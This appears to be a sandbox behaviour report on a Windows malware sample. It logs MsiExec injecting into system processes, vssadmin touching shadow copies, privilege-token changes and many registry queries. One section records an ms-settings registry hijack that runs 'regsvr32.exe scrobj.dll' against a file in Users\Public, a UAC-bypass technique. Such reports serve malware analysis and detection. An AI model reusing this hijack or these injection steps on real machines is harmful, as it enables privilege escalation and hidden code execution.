| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4028 set thread context of 2316 | N/A | C:\Windows\System32\MsiExec.exe | C:\Windows\system32\sihost.exe |
| PID 4028 set thread context of 2332 | N/A | C:\Windows\System32\MsiExec.exe | C:\Windows\system32\svchost.exe |
| PID 4028 set thread context of 2472 | N/A | C:\Windows\System32\MsiExec.exe | C:\Windows\system32\taskhostw.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\3a175e52-3a2b-486e-ab7e-cb310fed9ea3.tmp | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220322121845.pma | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Installer\1cdc67a.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\1cdc67a.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{F9FBBF96-A25A-4F7C-A937-484F62CA84D9} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIC83F.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSICEC8.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\1cdc67c.msi | C:\Windows\system32\msiexec.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Windows\System32\vds.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 | C:\Windows\system32\svchost.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters | C:\Windows\system32\vssvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A | C:\Windows\system32\svchost.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000008a0185136d91714e0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800008a0185130000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3f000000ffffffff0000000007000100006809008a018513000000000000d0120000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000008a01851300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000008a01851300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\svchost.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 | C:\Windows\System32\vds.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\System32\vds.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr | C:\Windows\system32\vssvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Mfg | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 | C:\Windows\system32\svchost.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\System32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\System32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\System32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\System32\vssadmin.exe | N/A |
| N/A | N/A | C:\Windows\System32\vssadmin.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open\command\DelegateExecute | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open\command\DelegateExecute | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1" | C:\Windows\system32\sihost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open\command | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open\command\DelegateExecute | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" | C:\Windows\system32\sihost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open\command | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55" | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open | C:\Windows\system32\regsvr32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\ms-settings\shell\open\command | C:\Windows\system32\regsvr32.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\System32\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\System32\MsiExec.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\System32\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\System32\MsiExec.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\msiexec.exe | N/A |
